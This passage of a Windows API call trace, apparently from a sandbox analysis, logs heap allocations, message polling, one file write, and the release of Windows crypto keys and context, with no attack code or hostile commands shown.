[0225.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.853] WriteFile (in: hFile=0x2d0, lpBuffer=0x3bf0dd8*, nNumberOfBytesToWrite=0x2318, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0dd8*, lpNumberOfBytesWritten=0x8cf5e4*=0x2318, lpOverlapped=0x0) returned 1 [0225.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0225.855] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0225.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0225.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.855] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0225.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.856] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0225.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0225.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0225.856] CryptDestroyKey (hKey=0xa87550) returned 1 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.858] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0225.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.858] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.859] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.859] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0225.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0225.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.859] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0225.859] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.859] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0225.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.859] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0225.860] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0225.860] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.860] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.860] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.860] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.860] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.860] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.860] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.860] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0225.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.861] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0225.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0225.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0225.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.861] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0225.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0225.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.861] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0225.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0225.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0225.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0225.861] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0225.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0225.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0225.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0225.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0225.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0225.863] HeapFree 